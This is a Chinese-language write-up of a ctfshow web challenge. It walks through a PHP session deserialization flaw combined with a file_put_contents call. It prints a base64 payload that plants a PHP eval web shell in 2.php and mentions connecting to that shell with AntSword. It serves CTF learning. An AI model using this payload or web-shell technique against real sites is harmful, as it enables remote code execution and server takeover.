ctfshow—web—一切看起来都那么合情合理

0x00 前言

• CTF 加解密合集
• CTF Web合集
• 网络安全知识库
• 溯源相关
• CISP汇总

文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取

0x01 题目

0x02 Write Up

简单看下，然后扫一下目录，发现一个www.zip 看一下源码

发现两个要点：

来看第一个地方：ini_set('session.serialize_handler', 'php'); 这个地方会反序列化session的内容

然后来看第二个地方：file_put_contents 这个方法可以写文件，那么就可以组合一下，通过反序列化去触发

构造一下poc，需要注意的是这里有base64.我们也需要base64一下

构造poc如下：

fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIyLnBocCI7czo4OiJwYXNzd29yZCI7czozMToiPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/PiI7czo2OiJzdGF0dXMiO047fQ==

然后先访问index.php

再访问/inc/inc.php

然后通过蚁剑连接：

0x03 other

欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源，技能树，面试题等。

以上